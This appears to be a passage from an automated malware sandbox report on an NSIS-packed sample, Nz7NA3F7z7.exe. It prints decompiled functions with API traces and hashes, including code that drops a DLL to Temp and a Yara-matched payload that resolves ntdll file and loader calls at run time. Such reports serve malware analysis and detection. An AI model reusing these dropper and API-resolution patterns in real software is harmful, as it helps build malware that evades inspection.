                                                                                    					}
                                                                                    					 *0x42e400 = _t18[1];
                                                                                    					 *0x42ecc8 = _t18[3];
                                                                                    					_t23 =  &(_t18[5]);
                                                                                    					if(_t23 != 0) {
                                                                                    						 *0x42e3fc = _t23;
                                                                                    						E00405B25(_t24,  *_t18 & 0x0000ffff);
                                                                                    						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, 0x42e420, 0xfffffffe));
                                                                                    						_t11 =  *0x42ec4c;
                                                                                    						_t27 =  *0x42ec48;
                                                                                    						if(_t11 == 0) {
                                                                                    							L15:
                                                                                    							return _t11;
                                                                                    						}
                                                                                    						_t25 = _t11;
                                                                                    						do {
                                                                                    							_t11 =  *_t27;
                                                                                    							if(_t11 != 0) {
                                                                                    								_t11 = E00405BE9(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                                    							}
                                                                                    							_t27 = _t27 + 0x418;
                                                                                    							_t25 = _t25 - 1;
                                                                                    						} while (_t25 != 0);
                                                                                    						goto L15;
                                                                                    					}
                                                                                    					L7:
                                                                                    					if(_t13 != 0xffff) {
                                                                                    						_t13 = 0;
                                                                                    					} else {
                                                                                    						_t13 = 0x3ff;
                                                                                    					}
                                                                                    				}
                                                                                    			}

















                                                                                    APIs
                                                                                    • SetWindowTextA.USER32(00000000,0042E420), ref: 0040397B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $1033
                                                                                    • API String ID: 530164218-2957225932
                                                                                    • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                    • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                                                    • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                    • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                    				long _t22;
                                                                                    
                                                                                    				if(_a8 != 0x102) {
                                                                                    					if(_a8 != 0x200) {
                                                                                    						_t22 = _a16;
                                                                                    						L7:
                                                                                    						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
                                                                                    							 *0x42a088 = _t22;
                                                                                    							E00405BC7(0x42a0a0, 0x42f000);
                                                                                    							E00405B25(0x42f000, _t22);
                                                                                    							E0040140B(6);
                                                                                    							E00405BC7(0x42f000, 0x42a0a0);
                                                                                    						}
                                                                                    						L11:
                                                                                    						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
                                                                                    					}
                                                                                    					if(IsWindowVisible(_a4) == 0) {
                                                                                    						L10:
                                                                                    						_t22 = _a16;
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					_t22 = E00404782(_a4, 1);
                                                                                    					_a8 = 0x419;
                                                                                    					goto L7;
                                                                                    				}
                                                                                    				if(_a12 != 0x20) {
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				E00403ECF(0x413);
                                                                                    				return 0;
                                                                                    			}





                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 00404E39
                                                                                    • CallWindowProcA.USER32 ref: 00404EA7
                                                                                      • Part of subcall function 00403ECF: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403EE1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                    • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                                                    • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                    • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                    				int _t5;
                                                                                    				long _t7;
                                                                                    				struct _OVERLAPPED* _t11;
                                                                                    				intOrPtr* _t15;
                                                                                    				void* _t17;
                                                                                    				int _t21;
                                                                                    
                                                                                    				_t15 = __esi;
                                                                                    				_t11 = __ebx;
                                                                                    				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
                                                                                    					_t7 = lstrlenA(E00402A29(0x11));
                                                                                    				} else {
                                                                                    					E00402A0C(1);
                                                                                    					 *0x40a040 = __al;
                                                                                    				}
                                                                                    				if( *_t15 == _t11) {
                                                                                    					L8:
                                                                                    					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                    				} else {
                                                                                    					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll", _t7, _t17 + 8, _t11);
                                                                                    					_t21 = _t5;
                                                                                    					if(_t21 == 0) {
                                                                                    						goto L8;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
                                                                                    				return 0;
                                                                                    			}










                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll, xrefs: 004024FD, 00402522
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileWritelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll
                                                                                    • API String ID: 427699356-1774131503
                                                                                    • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                    • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                                                                    • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                    • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405427(CHAR* _a4) {
                                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                                    				int _t7;
                                                                                    
                                                                                    				/* 0x42c0a8 is a static STARTUPINFOA; only cb is filled in
                                                                                    				   (sizeof(STARTUPINFOA) == 0x44 on x86). */
                                                                                    				0x42c0a8->cb = 0x44;
                                                                                    				/* Launch _a4 as a command line. Creation flags are 0, so this is a plain,
                                                                                    				   non-suspended start; handles are not inherited and no environment is passed. */
                                                                                    				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
                                                                                    				if(_t7 != 0) {
                                                                                    					/* Only the process handle is handed back; the primary-thread handle is closed. */
                                                                                    					CloseHandle(_v20.hThread);
                                                                                    					return _v20.hProcess;
                                                                                    				}
                                                                                    				/* 0 on failure. "Error launching installer", the NSIS stub's launch-failure
                                                                                    				   message, is referenced at 0040543A in this function (see Strings). */
                                                                                    				return _t7;
                                                                                    			}





                                                                                    Statement addresses, in source order (0x00000000 marks a statement with no code address): 0x00405430 0x0040544c 0x00405454 0x00405459 0x00000000 0x0040545f 0x00405463

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                    • CloseHandle.KERNEL32(?), ref: 00405459
                                                                                    Strings
                                                                                    • Error launching installer, xrefs: 0040543A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: Error launching installer
                                                                                    • API String ID: 3712363035-66219284
                                                                                    • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                    • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                                                    • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                    • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00403585() {
                                                                                    				void* _t2;
                                                                                    				void* _t3;
                                                                                    				void* _t6;
                                                                                    				void* _t8;
                                                                                    
                                                                                    				/* *0x42905c is the head of a singly linked list of loaded DLLs:
                                                                                    				   node+0 = next pointer, node+8 = HMODULE. E0040356A (body not shown
                                                                                    				   on this page) runs first; its return value is the fallback result. */
                                                                                    				_t8 =  *0x42905c;
                                                                                    				_t3 = E0040356A(_t2, 0);
                                                                                    				if(_t8 != 0) {
                                                                                    					do {
                                                                                    						_t6 = _t8;
                                                                                    						_t8 =  *_t8;              /* advance before the node is freed */
                                                                                    						FreeLibrary( *(_t6 + 8));  /* unload the plugin DLL */
                                                                                    						_t3 = GlobalFree(_t6);    /* nodes were allocated with GlobalAlloc */
                                                                                    					} while (_t8 != 0);
                                                                                    				}
                                                                                    				/* list head = NULL; "& 0" is the compiler's and-[mem],0 zeroing idiom */
                                                                                    				 *0x42905c =  *0x42905c & 0x00000000;
                                                                                    				return _t3;
                                                                                    			}







                                                                                    Statement addresses, in source order: 0x00403586 0x0040358e 0x00403595 0x00403598 0x00403598 0x0040359a 0x0040359f 0x004035a6 0x004035ac 0x004035b0 0x004035b1 0x004035b9

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                                                    • GlobalFree.KERNEL32 ref: 004035A6
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 1100898210-3916508600
                                                                                    • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                    • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                                                    • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                    • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405701(char* _a4) {
                                                                                    				char* _t3;
                                                                                    				char* _t5;
                                                                                    
                                                                                    				/* Split a path in place at its last backslash (same shape as the NSIS
                                                                                    				   stub's trimslashtoend): _a4 is left holding the directory and the
                                                                                    				   file-name component is returned. */
                                                                                    				_t5 = _a4;
                                                                                    				/* start at the terminating NUL and walk backwards to the last '\\' (0x5c) */
                                                                                    				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                    				while( *_t3 != 0x5c) {
                                                                                    					_t3 = CharPrevA(_t5, _t3);   /* DBCS-aware step back */
                                                                                    					if(_t3 > _t5) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;                        /* reached the start of the string */
                                                                                    				}
                                                                                    				/* NUL out the separator. With no backslash in the input this clobbers the
                                                                                    				   first byte instead and the returned name starts at offset 1. */
                                                                                    				 *_t3 =  *_t3 & 0x00000000;
                                                                                    				return  &(_t3[1]);
                                                                                    			}





                                                                                    Statement addresses, in source order (0x00000000 marks a statement with no code address): 0x00405702 0x0040570c 0x0040570e 0x00405715 0x0040571d 0x00000000 0x00000000 0x00000000 0x0040571d 0x0040571f 0x00405724

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nz7NA3F7z7.exe,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 00405707
                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nz7NA3F7z7.exe,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 00405715
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-1669384263
                                                                                    • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                    • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                                                    • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                    • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405813(CHAR* _a4, CHAR* _a8) {
                                                                                    				int _t10;
                                                                                    				int _t15;
                                                                                    				CHAR* _t16;
                                                                                    
                                                                                    				/* Case-insensitive substring search for _a8 (needle) in _a4 (haystack),
                                                                                    				   the same shape as mystrstri() in the NSIS stub. The caller at 00405A21
                                                                                    				   passes "[Rename]", the wininit.ini section used for rename-on-reboot. */
                                                                                    				_t15 = lstrlenA(_a8);
                                                                                    				_t16 = _a4;
                                                                                    				while(lstrlenA(_t16) >= _t15) {
                                                                                    					/* Terminate the haystack at needle length so lstrcmpiA compares exactly
                                                                                    					   _t15 characters. The decompiler shows this write but not the restore of
                                                                                    					   the saved byte; read literally the loop would stop after one position,
                                                                                    					   so treat the restore as elided by the decompiler rather than absent. */
                                                                                    					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                                    					_t10 = lstrcmpiA(_t16, _a8);
                                                                                    					if(_t10 == 0) {
                                                                                    						return _t16;             /* pointer to the match inside _a4 */
                                                                                    					}
                                                                                    					_t16 = CharNextA(_t16);      /* DBCS-aware advance */
                                                                                    				}
                                                                                    				return 0;                        /* not found */
                                                                                    			}






                                                                                    Statement addresses, in source order (0x00000000 marks a statement with no code address): 0x0040581f 0x00405821 0x00405849 0x0040582e 0x00405833 0x0040583e 0x00000000 0x0040585b 0x00405847 0x00405847 0x00000000

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                                                                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                    • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                                                    • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                    • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                    • Instruction ID: d3105f4d5f75fa6480941d81b4b8bd581525c59bab21666af283b4685eccbe10
                                                                                    • Opcode Fuzzy Hash: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                    • Instruction Fuzzy Hash: D3F0EC71200108AFCB04DF89DC80DEB77ADAF8C714F158258BE1D97241CA30E8518BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 37%
                                                                                    			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                    				void* _t18;
                                                                                    				void* _t27;
                                                                                    				intOrPtr* _t28;
                                                                                    				intOrPtr _t13;   /* temporaries the decompiler used without declaring */
                                                                                    				char* _t6;
                                                                                    				char* _t12;
                                                                                    
                                                                                    				/* _a4 is the payload's context structure; the slot at +0xc48 receives a
                                                                                    				   function pointer resolved at run time. E00418DC0 fills it from the table
                                                                                    				   at _a4+0x10 using index 0x2a; the API trace below shows that entry
                                                                                    				   resolving to ntdll!NtReadFile. */
                                                                                    				_t13 = _a4;
                                                                                    				_t28 = _a4 + 0xc48;
                                                                                    				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                    				_t6 =  &_a32; // 0x413d52
                                                                                    				_t12 =  &_a8; // 0x413d52
                                                                                    				/* Indirect call through the freshly resolved pointer. The nine arguments map
                                                                                    				   onto NtReadFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock,
                                                                                    				   Buffer, Length, ByteOffset, Key). Because the callee is looked up at run
                                                                                    				   time, an import-table listing of the dumped image does not attribute
                                                                                    				   NtReadFile to this call site; only the dynamic trace does. */
                                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                    				return _t18;
                                                                                    			}






                                                                                    Statement addresses, in source order: 0x00418273 0x0041827f 0x00418287 0x00418292 0x004182ad 0x004182b5 0x004182b9

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 35%
                                                                                    			E0041817A(void* __ebx, long __ecx, void* __edx, void* _a1, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40) {
                                                                                    				signed char _t20;
                                                                                    				long _t25;
                                                                                    				void* _t45;
                                                                                    				void* _t46;
                                                                                    				intOrPtr* _t48;
                                                                                    				long _t50;
                                                                                    
                                                                                    				asm("stc");
                                                                                    				if(__ecx >=  *((intOrPtr*)(__edx + 0x53))) {
                                                                                    					 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ __ecx;
                                                                                    					asm("adc al, 0x52");
                                                                                    					_t25 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __ecx, _t20 ^ 0x0000008b, _t50); // executed
                                                                                    					return _t25;
                                                                                    				} else {
                                                                                    					_t26 = _a4;
                                                                                    					_t4 = _t26 + 0xc3c; // 0xc64
                                                                                    					_t48 = _t4;
                                                                                    					E00418DC0(_t45, _a4, _t48,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
                                                                                    					return  *((intOrPtr*)( *_t48))(_a8, _a12, _a16, _a20, _a24, _t46, _t50);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                    • Instruction ID: 89afb2f1cf6171b8558e0c7e0ca09a0a510f862957134e4a4b828be0d8d9e918
                                                                                    • Opcode Fuzzy Hash: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                    • Instruction Fuzzy Hash: BF11E2B2204209BBCB08CF98DC84DEB77ADAF8C754B15864DFA5D97241CA30E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                    				char* _v8;
                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                                    				char _v536;
                                                                                    				void* _t15;
                                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                                    				void* _t30;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				_t24 = _a8;
                                                                                    				_v8 =  &_v536;
                                                                                    				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                                    				_t31 = _t30 + 0xc;
                                                                                    				if(_t15 != 0) {
                                                                                    					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
                                                                                    					_t32 = _t31 + 4;
                                                                                    					__eflags = _t17;
                                                                                    					if(__eflags != 0) {
                                                                                    						E0041B1F0(__eflags,  &_v12, 0);
                                                                                    						_t32 = _t32 + 8;
                                                                                    					}
                                                                                    					_t18 = E00419300(_v8);
                                                                                    					_v16 = _t18;
                                                                                    					__eflags = _t18;
                                                                                    					if(_t18 == 0) {
                                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                    						return _v16;
                                                                                    					}
                                                                                    					return _t18;
                                                                                    				} else {
                                                                                    					return _t15;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
